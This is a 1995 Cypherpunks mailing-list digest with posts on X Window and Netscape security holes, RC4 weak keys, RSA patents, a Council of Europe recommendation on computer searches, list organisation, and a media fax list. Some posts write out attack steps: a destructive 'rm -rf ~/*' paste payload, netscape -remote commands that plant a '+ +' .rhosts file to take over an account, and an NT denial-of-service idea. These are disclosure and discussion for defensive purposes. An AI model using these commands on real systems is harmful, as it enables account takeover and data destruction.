multiple X cleints to lissten for tthe same events on the same windows, so a simple program could track all keystrokes and capature your passwords. Failing all of that any X client could track ownership of the X selection (the "cut buffer" normally used to hold text), and when it looks like a Unix command (implying that you will be pasting it into the command line) assert ownership of the selection itself and put in "^X^U^H;rm -rf ~/*" followed by a carrage return. That's just off the top of my head ('tho I admit I have written two of the three "exploits" while I was a sysadmin 4 years ago in an effort to convinse my managers to mandate better security then "xhost +"...). So saying "Netscape isn't secure when my X server isn't" is alot like saying "When I leave the front door of my house unlocked my VCR isn't safe!". -- Not speaking for my employer, or anyone other then myself. From banisar at epic.org Fri Sep 29 09:49:27 1995 From: banisar at epic.org (Dave Banisar) Date: Fri, 29 Sep 95 09:49:27 PDT Subject: COE Document Message-ID: ------------------------------------------------------------------------ A HTML Version of this document is available at the Privacy International Archives at www.privacy.org/pi/intl_orgs/coe/info_tech_1995.html Recommendation No. R (95) 13 of the Committee of Ministers to Member States Concerning Problems of Criminal Procedure Law Connected with Information Technology (Adopted by the Committee of Ministers on 11 September 1995 at the 543 meeting of the Ministers' Deputies) The Committee of Ministers, under the terms of Article 15.b of the Statute of the Council of Europe. Considering that the aim of the Council of Europe is to achieve a greater unity between its members; Having regard to the unprecedented development of information technology and its application in all sectors of modern society; Realizing that the development of electronic information systems will speed up the transformation of traditional society into an information society by creating a new space for all types of communications and relations; Aware of the impact of information technology on the manner in which society is organised and on how individuals communications and interrelate; Conscious that an increasing part of economic and social relations will take place through or by use of electronic information systems; Concerned at the risk that electronic information systems and electronic information may also be used for committing criminal offenses; Considering that evidence of criminal offenses may be stored and transferred by these systems; Noting that criminal procedure laws of members states often do not yet provide for appropriate powers to search and collect evidence in these systems in the course of criminal investigations; Recalling that the lack of appropriate special powers may impair investigating authorities in the proper fufilment of their tasks in the face of the ongoing development of information technology; Recognising the need to adopt the legitimate tools which investigating authorities are afforded under criminal procedure laws the the specific nature of investigations in electronic information systems; Concerned by the potential risk that member states may not be able to render mutual legal assistance in an appropriate way when requested to collect electronic evidence within their territory from electronic information systems; Convinced of the necessity of strengthening internation co-operation and achieving a greater compatibility of criminal procedural laws in this field; Recalling Recommendation No. R (81) 20 of the Committee of Ministers on the harmonisation of laws relating to the requirement of written proof and to the admissibility of reproductions of documents and recordings on computers, Recommendation No. R. (85) 10 on letters rogatory for the interception of telecommunications, Recommendations No. R (87) 15 regulating the use of personal data in the police state and Recommendations No. R (89) 9 on computer-relating crime, Recommends the governments of member states: i. when reviewing their internal legislation and practice, to be guided by the principles appended to this recommendation; and ii. to ensure publicity for these principles among those investigating authorities and other professional bodies, in particular in the field of information technology, which may have an interest in their application. Appendix to Recommendation No R. (95) 13 concerning problems of criminal procedure law connected with information technology I. Search and seizure ----------------------------- 1. The legal distinction between searching computers systems and siezing data stored therein and intercepting data in the course of transmission should be clearly delineated and applied. 2. Criminal procedure laws should permit investigating authorities to search computer systems and seize data under similar conditions as under traditional powers of search and seizure. The person in charge of the system should be informed that the system has been searched and of the kind of data that has been siezed. The legal remedies that are provided for in general against search and seizure should be equally applicable in case of search in computer systems and in case of seizure of data therein. 3. During execution of a search, investigating authorities should have the power, subject to appropriate safeguards, to extend the search of other computer systems within their jurisdiction which are connected by menas of a network and seize the data therein, provided immediate action is required. 4. Where automatically processed data is functionally equivalent to a traditional document, provisions in the criminal procedure law relating to search and seizure of documents should apply equally to it. II. Technical Surveillance ------------------------------------- 5. in view of the convergance of information technology and telecommunications, law pertaining to technical surveillance for the purpose of criminal investigations, such as interception of telecommunications, should be reviewed and amended, where necessary, to ensure their applicability. 6. The law should permit investigating authorities to avail themselves of all necessary technical measures that enable the collection of traffic data in the investigation of crimes. 7. When collected in the course of a criminal investigation and in particular when obtained by means of intercepting telecommunications, data which is the object of legal protection and processed by a compuer system should be secured in an appropriate manner. 8. Criminal procedure laws should be reviewed with a view to making possible the interception of telecommunications and the collection of traffic data in the investigation of serious offenses against the confidentiality, integrity and availability of telecommunications or computer systems. III. Obligations to co-operate with the investigating authorities -------------------------------------------------------------------- 9. Subject to legal privileges or protection, most legal systems permit investigating authorities to order persons to hand over objects under their control that are required to serve as evidence. In a parallel fashion, provisions should be made for the power to order persons to submit any specified data under their control in a computer system in the form required by the investigating authority. 10. Subject to legal privileges or protection, investigating authorities should have the power to order persons who have data in a computer system under their control to provide all necessary information to enable access to a computer system and the data theirin. Criminal procedure law should ensure that a similar order can be given to other persons who have knowledge about the functioning of the computer system or measures applied to secure the data therein. 11. Specific obligations should be imposed on operators of public and private networks that offer telecommunications services to the public to avail themselves of all necessary technical measures that enable the interception of telecommunications by the investigating authorities. 12. Specific obligations should be imposed on service providers who offer telecommunications services to the public, either through public or private networks, to provide information to identify the user, when so ordered by the compentant investigating authority. IV. Electronic Evidence ------------------------ 13. The common need to collect, preserve, and present electronic evidence in ways that best ensure and reflect their integrity and irrefutable authenticity, both for the purposes of domestic prosecution and international co-operation, should be recognized. Therefore, procedures and technical methods for handling electronic evidence should be further developed, and particularly in such a way as to ensure their compatability between states. Criminal procedural law provisions on evidence relating to tradition documents should similarly apply to data stored in a computer system. V. Use of Encryption --------------------- 14. Measures should be considered to minimise the negative effects of the use of cryptography on the investigation of criminal offenses, without affecting its legitimate use more than is strictly necessary. VI. Research, statistics and training ------------------------------------- 15. The risks involved in the development and application of information technology with regard to the commission of criminal offenses should be assured continuously. In order to enable the competent authorities to keep abrest of new phenomena in the field of computer related offenses and to develop appropriate counter-measures, the collection and analysis of data on these offenses, including modus operandi and technical apsects, should be furthered. 16. The establishment of specialised units for the investigation of offenses, the combating of which requires special expertise in information technology, should be considered. Training programmes enabling criminal justice personnel to avail themselves of expertise in this field should be furthered. VII. International Cooperation ------------------------------ 17. The power to extend a search to other computer systems should also be applicable when the system is located in a foreign jurisdiction, provided that immediate action is required. In order to avoid possible violations of state sovereignity or international law, an unambigious legal basis for such extended search and seizure should be established. Therefore, there is an urgent need for negotiating international agreements as to how, when and to what extent such search and seizure should be permitted. 18. Expedited and adequate procedures as well as a system of liason should be available according to which the investigating authorities may request the foreign authorities to promptly collect evidence. For that purpose the requested authorities should be authorized to search a computer system and seize data with a view to its subsequent transfer. The requested authorities should also be authorized to provide trafficking data rtelated to a specific telecommunication, intercept a specific telecommunication or identify its source. For that purpose, the existing mutual legal assistance instruments need to be supplemented. _________________________________________________________________________ Subject: COE Document _________________________________________________________________________ David Banisar (Banisar at epic.org) * 202-544-9240 (tel) Electronic Privacy Information Center * 202-547-5482 (fax) 666 Pennsylvania Ave, SE, Suite 301 * HTTP://www.epic.org Washington, DC 20003 * ftp/gopher/wais cpsr.org From mdiehl at dttus.com Fri Sep 29 09:52:54 1995 From: mdiehl at dttus.com (Martin Diehl) Date: Fri, 29 Sep 95 09:52:54 PDT Subject: Netscape "random" number seed generator code available Message-ID: <9508298123.AA812398949@cc2.dttus.com> on 9/24/95 karlton at neon.netscape.com (Phil Karlton) at Internet-USA wrote: The random number seed generation code is now available for review: ftp://ftp1.netscape.com/pub/review/RNGsrc.tar.Z My platform is DOS 6.22, Windows 3.11 Can someone suggest a program (and where to get it) that will run on my platform and extract the tar.z files into DOS ASCII files so that I can review the key generator code? Thanks for your help. Martin G. Diehl From sameer at c2.org Fri Sep 29 09:55:35 1995 From: sameer at c2.org (sameer) Date: Fri, 29 Sep 95 09:55:35 PDT Subject: Netscape hole without .Xauthority (fwd) In-Reply-To: Message-ID: <199509291644.JAA07516@infinity.c2.org> That's called an X hole, not a netscape hole. > > > Haven't seen this on the cypherpunks yet, sorry if this has been here=20 > already.=20 > > Juri > > >o tel: +372 6308994 o> > > ---------- Forwarded message ---------- > > There's a huge hole in the Netscape remote control mechanism for the > X-Windows based clients.=20 > Potential impact : anybody can become any user that uses Netscape on any > system without sufficient X security. > > Let's suppose that you have an account on a target machine, where somebody > is using Netscape, and either the xhost checking is disabled, or you can > set the xhost yourself (e.g. if you have an account and the target user has > no .Xauthority, as is frequent in university computer rooms). > Then you can gain access to the target user's account using the following > steps : > > - make a text file containing only "+ +" accessible (as file, as URL, or > whatever you like) to the target Netscape client. This is quite easy, eit= > her > if you have a personal WWW page (http://... URL) or an account on the > target machine (file://... URL), or even by uploading it to an anon FTP > > - set your DISPLAY environment variable to the target display > > - run the following set of commands : > > netscape -noraise -remote "openURL()" > netscape -noraise -remote "saveAs(.rhosts)" > netscape -noraise -remote back > > In the second command, the path should be specified whenever possible=20 > (~ is not accepted). > > If the target user does not already have a .rhosts and is not looking at th= > at > precise moment, then the chances are it worked ! > > Solution to the problem : every user concerned should either create a=20 > Xauthority file, or stop using Netscape. > > =09MXK > > > PS: WHY do they bother with PGP and RSA security when they keep such holes = > ???? > > +------------------------------------+---------------------------------+ > | Denis AUROUX (MXK) | Ecole Normale Superieure | > | 255 rue Saint-Jacques | 45 rue d'Ulm | > | 75005 PARIS FRANCE | 75005 PARIS | > | email: auroux at clipper.ens.fr | FRANCE | > +------------------------------------+---------------------------------+ > | This .sig is SHAREWARE. If you use it often, please send me $50. | > | After registering you will receive a fully functional .sig and all | > | updates for free. | > +----------------------------------------------------------------------+ > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From ses at tipper.oit.unc.edu Fri Sep 29 09:58:17 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Fri, 29 Sep 95 09:58:17 PDT Subject: Crypto hardware (was: Using sound cards to accelerate RSA?) In-Reply-To: <199509290354.XAA21646@frankenstein.piermont.com> Message-ID: On Thu, 28 Sep 1995, Perry E. Metzger wrote: > world, have real clients, and actually worry about this as a > problem. This *is* a legitimate problem. Consider what the load on a > web site using D-H key exchange for every connection gets like when > you have millions of people hitting it every day. This is the problem I was concerned about (actually RSA rather than D-H). In HTTP-NG, in addition to supporting PK for key exchanges and authentications, there is now support that allows most values used in the protocol to be signed. Now that non repudiability is becoming legally significant, there are all sort of things that either party might want to have signed, for example negotiation options (e.g. wont-log-transactions) and meta-information (e.g. kidcode: NC-17,barney-boffing). More clients and more signings means that conventional chips arent't going to be economical for this. [stuff on hardware] > > The reason the market for this is weird is the same reason Sun took > the DES chips off its motherboards years ago -- you can't conduct > modern business with the fucked up export regime we are dealing with. That's another question. A DSP chip can also be used for crypto - yet sound cards and nexts aren't ITARed, and aren't really considered dual-use. A Modular exponentiator isn't a crypto device (hey - it's a bignum accelerator for Mathematica). Now, if I had a pipelined WSI chip capable of delivering one result per cycle, I could think of some useful applications, but ... Simon From ses at tipper.oit.unc.edu Fri Sep 29 10:09:34 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Fri, 29 Sep 95 10:09:34 PDT Subject: Hack Microsoft In-Reply-To: <199509281510.LAA21039@frankenstein.piermont.com> Message-ID: On Thu, 28 Sep 1995, Perry E. Metzger wrote: > Thats almost an invitation to hack Microsoft's web products, isn't it? Not a real attack- cos it's just a Denial Of Service, but it is kind of amusing... Windows NT has an interesting property in its handling of TCP connection establishment. NT has a small limit on the maximum size of its listen queue - it also handle queue overflow in a different way to BSD derived stacks. Instead of just dropping the connection request, and allowing the client TCP to retry automatically, NT sends a RST packet that aborts the connection. Ok, you can shutdown just about anything on the Net right now, and there won't be a real defence possible until IPSEC starts getting installed, but microsoft makes it much too easy. Simon From stewarts at ix.netcom.com Fri Sep 29 10:16:59 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 29 Sep 95 10:16:59 PDT Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat) Message-ID: <199509291716.KAA06460@ix8.ix.netcom.com> At 01:01 PM 9/29/95 S, Andrew Roos wrote: >(This is a repeat because I posted the original 36 hours ago and it still >hasn't bounced back to me.) Hmmm - I got it yesterday, so it did go out. >The attack is based on two particularly interesting three-byte key >prefixes which have a high probability of producing PRNG sequences >which start with a known two-byte sequence. The prefixes are: >1. Keys starting with "00 00 FD" which have a 14% probability of > generating sequences which start "00 00". >2. Keys starting with "03 FD FC" which have a 5% probability of > generating sequences which start "FF 03". [much interesting work deleted] It sounds like any application using RC4 with random session keys should start by testing session keys and rejecting any that start with 00 00 or 03 FD; it means doing 2**-15 more random key generations, and reducing the brute-force space by 2**-15, but it's a pretty small reduction. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Fri Sep 29 10:17:42 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 29 Sep 95 10:17:42 PDT Subject: Q&A on the RSA/Cylink legal dispute Message-ID: <199509291716.KAA06480@ix8.ix.netcom.com> At 08:27 AM 9/29/95 -0400, Jeff Barber wrote: >That's pretty clear to me folks, but make your own judgements. >> If you're using RSA's software -you didn't write your own- you don't need >> a separate patent license under either the MIT or Stanford patents. >Again, only to the extent that you're not infringing the Stanford patents. > >So, pay your nickel, take your chances. Does RSA's software infringe >the Stanford patents? The RSA algorithm, and thus RSA's software, uses public-key cryptography, and is therefore within the scope of the claims of the Merkle-Hellman and/or Hellman-Pohlig patents. Also, the recent RSAREF versions contain Diffie-Hellman code, which is covered by the Diffie-Hellman patents (but PGP doesn't use that version of RSAREF.) On the other hand, the RSAREF license says that RSA will defend any patent claims for use of its code (I forget if that was RSADSI or RSA Labs), and Jim Bidzos confirms that that's still the case even after the PKP breakup. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From frissell at panix.com Fri Sep 29 10:28:47 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 29 Sep 95 10:28:47 PDT Subject: Info War Comes Home Message-ID: <199509291728.NAA27408@panix.com> [Note: Whenever I do one of my longer pieces, it seems to drop into the void. Perhaps they are so well written and complete that no one can think of any comment to make on them. Perhaps not. Read this one and comment. You won't regret it.] In honor of the Second Annual Conference on Information Warfare a few weekends ago, here is my proposal towards a paper to be presented at next year's conference. ************************************************************************* The Mesh in the 'Hood If any of you have not read every word of The Economist's Survey of Defence Technology - "Softwar" in the June 10, 1995 issue --- shame on you. Do so immediately. In that report, there is the following description of the future battlefield without platforms (ships, aircraft, armor). AKA the Mesh. The Mesh is a network imposed over a landscape (what used to be called a battlefield). The network of sensors, smart munitions, small attack modules, and perhaps human troops, shares information and kills enemies moving through it. Friendly forces travel through it as if it weren't there. It is "flat." Hills and valleys disappear and expensive platforms [tanks, helicopters, etc.] have nowhere to hide since it is co-extensive with the whole territory it covers. It is also tough because it is hard to destroy enough parts of it to make a difference. Nuclear munitions might destroy a Mesh or imposing a stronger Mesh over an existing one might work if you didn't mind wholesale destruction but defeating it without massive destruction is hard. To quote from the Survey: "The mesh has a number of advantages. It is hard to attack, because its strength is spread widely. It is hard to damage, because there are so many communication paths. Many small sensors can provide a better picture than a few large ones. More sensors allow the information domain to conform more closely to the physical terrain. At the moment line-of-sight detection by sensors in a widespread network leaves topographical blind spots--wadis, narrow valleys--in which platforms such as attack helicopters can lurk." "While nets may see through the fog of war, meshes also tackle another of the problems von Clausewitz identified; war's friction. The mesh is a war machine with almost no moving parts, save the actual warheads of the weapons. It is a solid-state device; its mechanisms have migrated far into the spectral dimension of information, leaving only a thin skeleton framework in the world of height, breadth and depth." It certainly makes for a challenging war environment. The Mesh is created by warriors to effectively serve warriors' ends, I would like to suggest the possibility that civilians might create their own Mesh to serve their ends. A Mesh is Just a Net with Attitude The Internet is (as we all know) a network of interconnected computers that cooperate to exchange information in a standardized fashion. Its purpose is communication. If its purpose is extended, it can become a Mesh. Assume that the Net has grown in size and importance so that a significant portion of the population in a given geographic area is fully wired --- hardly a dramatic assumption. All of those machines are cooperating to enable the various sorts of communications that people want to use the Net for. Some of those machines are already connected to external cameras to do "silly" things like put pictures of Stockholm on the WWW. What if people connected other things to the Net? While it is unlikely that most people will put a chain gun in the window and interface it with the Net anytime soon, other useful connections are possible. [And even in the case of weaponry, specific neighborhoods might be interested in doing creative things now. Thus Bo Grtiz' heavily armed, Patriot, Recreational Subdivision in Idaho might find a use for the Mesh. And won't those Black Helicopters be surprised.] More peaceful civilians might deploy a Mesh to protect themselves against bad people whether official or unofficial. Like the existing Speedtrap website (http://www.nashville.net/speedtrap/) but in real time, cameras and passive sensors could track the minions of the State as they cruise through neighborhoods. They could also multicast live, full color, and audio images of arrests and less formal interactions with the authorities. Fans of Robert Heinlein will recall that Jubal Harshaw used a version of this strategy in "Stranger in a Strange Land." Cops behave better when they are on camera (and know it.) The Net allows everyone to play. END OF PART I (More next week). From tcmay at got.net Fri Sep 29 10:35:41 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 29 Sep 95 10:35:41 PDT Subject: "Who shall speak for us?" Message-ID: The questions "Who are the Cypherpunks?" and "Who shall speak for us?" have come up several times, in different contexts: -- Reporters want "human interest" stories for their other stories on Netscape cracks, SSL challenges, arrests, executions, etc. They want to know who we are, what our agenda is, what motivates us, and who our spokesmen are. -- "Who shall be our Spokesman?" keeps coming up. "Who shall speak for us?" -- There is once again talk about "getting organized" so as to better compete with EPIC, EFF, CPSR, VTW, ACLU, etc. While no one is seriously advocating a formal, dues-collecting organization, their is an undercurrent of thought that we had better get more organized or we'll just be roadkill on the information superduperhighway. -- And there seems to be a sense of uneasiness amongst some of us that there can't be a "Cypherpunks group" without organization, without hierarchy. In contrast, there have been points made that we are "nothing," not even a group, and that we are only a set of mailing list subscribers. I think this is too extreme a view, as we clearly have: * some sense of membership in a group, some sense of cohesion, some sense of "Us" vs. "Them." * regional activities in several parts of the U.S. and in some non-U.S. countries. * a growing archive of postings, of knowledge gained through hard work. So, we are _more_ than just the subscribers to a mailing list, but _less_ than a formal organization with shareholders, voters, elected officials, and a Great Leader at the top. What are we, then? One parallel is to a bunch of folks who meet at a gathering spot, perhaps a bar or pub. Perhaps a reading group, a book club. People who talk, speculate, exchange theories, and even decide on things that some of them will do. Maybe these folks, an ever-changing set of folks, will come to some commonly-held viewpoints, though not held by all folks, and not "voted on" to be the Official Position of this informal gathering of folks at the local bar. Cyberspace allows for all sorts of new kinds of "watering holes" where such emergent, loosely-organized, anarchic groups may develop. These "virtual communities" are an incredibly important development. (My paper given at Imagina '95, in Monte Carlo, "Crypto Anarchy and Virtual Communities," goes into this in detail.) Another parallel is to what is sometimes called an "invisible college." Academic researchers in a country or around the world form a loose kind of invisible college, a network of people at various institutions that share a common interest and that have certain emergent standards. Think of the cryptology researchers, or the fusion researchers, of the world. In this invisible college, reputations matter. Some researchers are more esteemed than others, some play different roles than others. Some of them are mostly teachers, others are buried deeply in their laboratories. And, as with the informal pub gathering, this invisible college does not have to "vote" on an official position, or "elect" leaders. Ah, I hear some of you pointing out, "But in fact some of these invisible colleges _do_ elect officials and _do_ have official positions!" Indeed, many invisible colleges develop subsets that have formal structures and become the de facto _professional guilds_ for their organizations. The American Association of Chiropractic Examiners, the French League of Graph Paper Experts, the Russian Federation of Agriculturists, and on and on. (More seriously, the American Bar Association, the American Medical Associatio, etc.) Often these "professional organizations" are designed to extend the reach of these organizations, to give official titles to the early organizers, and to lobby governments for laws favorable to their members. Often these formal organizations adopt licensing rules and regulations to "police themselves" and also, in well-known cases of "public choice" theory and "rent-seeking behavior," to limit the number of competitors. Often the other hierarchies, such as the State itself, endorse the rules adopted by the professional guilds. (I'm not saying anyone is directly arguing that the Cypherpunks, not even by innuendo, become a professional guild, but some of the clamoring about how we need to adopt a less threatening or strange name, organize ourselves more hierchically, and present a more unified front is often a step toward a rigid bureaucracy.) It's been gratifying to me, at least, that the Cypherpunks group has not fallen prey to this temptation, that in an important sense "we practice what we preach." We claim to be an "anarchy," not a "hierarchy." While it may be the case that each of us has his or her own personal heirarchical ratings of others, it is important that we never have tried to formalize or "vote on" these ratings. Or voted to elect a Great Leader. Our strength is in our numbers and in our ideas, not in the guy we have ensconced in an office in Washington so he can give press conferences and sound bites for journalists. Our strength is in our multi-headed (dare I mention "Medusa"?), multinational, informal lack of structure. "But how will _We_ compete with the organizations that have Washington offices? How will we get "air time" if we have no Spokespunk in Washington, or no list of Official Spokespunks that journalists can call to get The Cypherpunks Slant on things? Who shall speak for us?" The answer is simple: Let no one claim to speak for "us." Let no one claim to be a speaker for others. Let journalists adjust to a new way of speaking, a nonhierarchical way of saying "I think" and "My view is." Let journalists contact the people actually doing something they are writing about. Let journalists call the people directly involved, not the Official Spokespunks. It may be _easier_ for some journalists to simply call the guy they always call, just to get a "reaction quote," but our job is not to make it easier for some lazy journalists. And let those who dislike the name "Cypherpunks" call themselves something else. Nothing's stopping them. Of course, it may be that the people wanting a more conservative, more staid name also wish to "inherit" the mantle the Cypherpunks now have, wish to convey to the "International Association of Cybernetic Privacy Advocates," or whatever, the membership and reputation of the current and past Cypherpunks. This, I think, is the "old way" of doing things, the herd way. If the views many of us have about anarchy and cyberspace are correct, this way of operating represents the future. If not, who cares what we think? --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From bwern at jax.jaxnet.com Fri Sep 29 11:02:11 1995 From: bwern at jax.jaxnet.com (Ben Wern) Date: Fri, 29 Sep 95 11:02:11 PDT Subject: HP Lobbies for Exportable Crypto Message-ID: <199509291809.OAA13405@jax.jaxnet.com> >From the 28th of September's EDUPAGE: HP LOBBIES FOR EXPORTABLE ENCRYPTION PLAN Hewlett-Packard has developed an encryption strategy with the French company Gemplus SCA that they're hoping will pass the tough scrutiny of U.S. export controllers. The plan takes a two-pronged approach -- an "encryption engine" that works in conjunction with a code-making formula that can be adjusted to any level deemed acceptable by the U.S. government, and a policy card that would be reviewed on a case-by-case basis by the State Department. The flexible system is designed to adapt to changing government policies, and could even accommodate a key escrow system like the Clipper chip. "There was a lot of skepticism when HP first proposed it. But it looks to me that they are well on the way to the next step," says a former encryption specialist at the National Institute of Standards and Technology. (Wall Street Journal 27 Sep 95 B7) Ben Wern bwern at jaxnet.com | bwern at pathtech.com | bwern at unf.edu SAY NO TO TALKING COWS! ------------------------------------------------------------------------- "We are more than the sum of our knowledge, we are the products of our imagination." From hallam at w3.org Fri Sep 29 11:41:12 1995 From: hallam at w3.org (hallam at w3.org) Date: Fri, 29 Sep 95 11:41:12 PDT Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?) In-Reply-To: <199509290659.XAA09185@ix7.ix.netcom.com> Message-ID: <9509291841.AA29412@zorch.w3.org> >I for one am against any kind of GAK on moral grounds. I also think >that trying to implement mandatory GAK in a software only system >would be a nightmare. If people care to look at my very old Shen work they will see a key escrow facility. This was installed becase as a network administrator at a sensitive site. I'm a big fan of key escrow. I just don't think I should be forced to use it on a public network by a government. I need the ability to secure internal channels inside certain sites however. I don't think I want the Whitehouse running with each staffer providing their own personal encryption system. Phill. From AndrewR at beetle.vironix.co.za Fri Sep 29 12:00:13 1995 From: AndrewR at beetle.vironix.co.za (Andrew Roos) Date: Fri, 29 Sep 95 12:00:13 PDT Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat) Message-ID: <306C426E@beetle.vironix.co.za> Hi Bill You could check for the full three-byte prefix, which further reduces the number of keys you have to discard. Although all keys beginning "00 00" are weak in the sense of my original post, they do not appear to be as exploitable as the prefixes which generate two-byte probable sequences. I also recommend generating and discarding some initial sequence bytes, since the generation process mixes up the state table further. An extra "round" through the state table (i.e. generating 256 bytes) _appears_ to confuse things significantly, since by the time you've generated the initial state table from the key, Index Y is a function of all bytes of the key, so the second time around it's hard to figure out the impact of the byte swaps. But I wouldn't trust this without a significant amount of analysis: as always in this field, appearances can be dangerously deceptive. Of course, this defense is not possible with protocols like SSL where you have to follow the spec - or better still, PCT which conveniently moves the MAC to the *end* of the record, exposing the initial stream... Andrew ---------- From: stewarts[SMTP:stewarts at ix.netcom.com] Sent: 29 September 1995 10:16 To: Andrew Roos Cc: cypherpunks Subject: Re: Cryptanalysis of RC4 - Preliminary Results (Repeat) It sounds like any application using RC4 with random session keys should start by testing session keys and rejecting any that start with 00 00 or 03 FD; it means doing 2**-15 more random key generations, and reducing the brute-force space by 2**-15, but it's a pretty small reduction. ________________________________________________________________ Andrew Roos // C++ programmers have class (but not much inheritance) PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26 Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos From stewarts at ix.netcom.com Fri Sep 29 12:02:48 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 29 Sep 95 12:02:48 PDT Subject: VISA and Microsoft STT Specs available Message-ID: <199509291902.MAA23808@ix8.ix.netcom.com> At 11:10 AM 9/29/95 -0400, Phill wrote: >Yes, VISA put the ASCII on their site... >We only host the ps version. Thanks! I looked at the Visa site, and it has a usable form of the documents still under construction; I waded through the 73-separate-page HTML version for a while.... There's some good intro material on how you use the stuff and who's responsible for what. Microsoft has the technical specs as one big slightly-HTMLized text file under http://www.windows.microsoft.com/windows/ie/stt.htm ; it's _much_ more readable, and has a pointer to the Visa version. (It's one big 
 with a few  and hrefs, in black-on-white.)

Some cryptographic high points, from a brief scan.
- 1024-bit RSA signatures, using PKCS#1 format.
- SHA 160-bit hashes
- Symmetric bulk crypto includes two options (I haven't yet seen
  how you choose between them; I assume it's export/domestic?)
  == RC4/64 with 24 bits of salt leaving 40 bits of real key
  == DES-CBC - yes, that's single-DES.  IV=0.
#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From carolann at censored.org  Fri Sep 29 12:11:22 1995
From: carolann at censored.org (Censored Girls Anonymous)
Date: Fri, 29 Sep 95 12:11:22 PDT
Subject: This fax list is 95% accurate!
Message-ID: <199509291911.MAA13112@usr1.primenet.com>


Sorry the whole HTML is here,
however, if you now want to 
make "A CYPHERPUNK SPEAKS....."
Press Release, this fax list 
will do it for you, only two
or three numbers are unverified!
(and that's as of today!)






Fearless Fax Numbers Revised 9-29-95





Transgender Lobby Days Website




I promised last week that I would send this out when the idea of a
blanket-fax-campaign for a c-punks press release was being discussed.
Sorry it took me so long to get around to it, but here it is.
I was mistaken in my original posting:  it includes neither the Fox Network
_nor_ the Eye on America show, but I'm sure we'll find those numbers
somewhere.

I got it from the Iron Feather Journal, volume 14.  I have no reason to
believe that any of these numbers are incorrect, but some of them may
have changed.

Also:  personal apologies to anyone who considers this to be noise.  Please
restrict all flames to private e-mail.

Anybody wanna fax Ted Turner?  :)

ABC 20/20	    NY			1-212-456-2969
Ann Arbor News	    Ann Arbor, MI	1-313-994-6879
AP		    Los Angeles		1-213-748-1200
AP		    San Diego		1-619-291-2098
AP (Broadcast)      Washington, D.C.    1-202-955-7367
Associated Press    Los Angeles         1-213-748-9836  Steve Loeper
Associated Press    Phoenix, AZ 	1-602-254-9573  Assignment Editor
Associated Press    San Francisco	1-415-552-9430  Bill Schiffmann
Associated Press MN Minneapolis, MN	1-612-332-4245
Boston Phoenix	    Boston, MA		1-617-536-1463
Boulder Daily Camera Boulder, CO	1-303-442-1508
C-SPAN		    Washington, D.C.    1-202-737-6226  Sarah Traheorn
CBS		    Washington, D.C.    1-202-659-2586
CBS (Radio)	    Washington, D.C.    1-202-659-5578
CBS Eve News	    NY			1-212-975-2115
CBS Morning	    Washington, D.C.    1-202-331-1765
CBS News	    Los Angeles		1-213-651-0285  Jennifer Siebens
CBS News	    San Francisco	1-415-362-7417  John Blackstone
CBS TV		    Los Angeles		1-213-651-0321
CBS TV 		    San Francisco	1-415-362-7417
Chicago Sun-Times   Chicago, IL    	1-312-321-3084
Chicago Tribune     Chicago, IL		1-312-222-3143
CNN		    San Francisco       1-415-398-4049
CNN President	    Atlanta, GA		1-404-827-1575  Ted Turner
Coloradoan	    Fort Collins, CO	1-303-224-7726
Denver Post	    Denver, CO		1-303-820-1369
Der Spiegel	    Hollywood, CA	1-213-851-9867  Frances Schoenberg
Detroit News	    Detroit, MI		1-313-222-2335
ESPN		    Bristol CT		1-800-592-3776
Gannett	  	    Washington, D.C.	1-202-243-0190
Gannett News Service Sacramento, CA	1-916-446-7326  Becky Lavally
KFAN AM	     Minneapolis		1-612-820-4265
Kostabi Media		New York	1-212-925-3055
Mother Jones	    San Francisco, CA	1-415-863-5136  Douglas Foster
NBC		    Washington, D.C.	1-202-362-2009
NBC News	    Burbank, CA		1-818-840-4275  Heather Allan
NBC News President New York NY	1-212-315-4037
NBC TV	  	    Los Angeles		1-818-840-4275
Newsweek	    Washington, D.C. 	1-202-783-6512
NPR Radio	    San Francisco, CA	1-415-553-2241
NY Times	    New York, NY	1-212-556-4603
PBS		    Alexandria, VA	1-703-739-0775
Pulse! 		    West Sacramento, CA 1-916-373-2480  Laurie Macintosh
Rainbow Coalition   Washington, D.C. 	1-202-728-1192
Reuters             Los Angeles		1-213-622-0056
Rocky Mountain News Denver, CO		1-303-892-5499
Scripps Howard	    Washington, D.C.	1-202-408-8116
Shareware Magazine  Sunnyvale, CA	1-602-839-2872  Tracy Stephenson
Sports Fan Radio Net  Las Vegas NV      1-702-737-1906
Time	 	    San Francisco, CA	1-415-434-5209  Paul Witteman
Time Magazine	    NY			1-212-522-0451
UPI		    Boston, MA		1-617-338-9774  Barry Fly
UPI		    Los Angeles		1-213-620-1237
UPI		    San Francisco	1-415-552-3585  Bill Bucy
UPI		    Seattle, WA		1-206-283-0408  Penny Spar
UPI		    Washington, D.C.    1-202-789-2362
UPI (Radio)	    Washington, D.C.    1-202-842-3625
US News & Wrld Rprt Washington, D.C.    1-202-955-2713
USA Today	    Washington, D.C.	1-202-955-2049
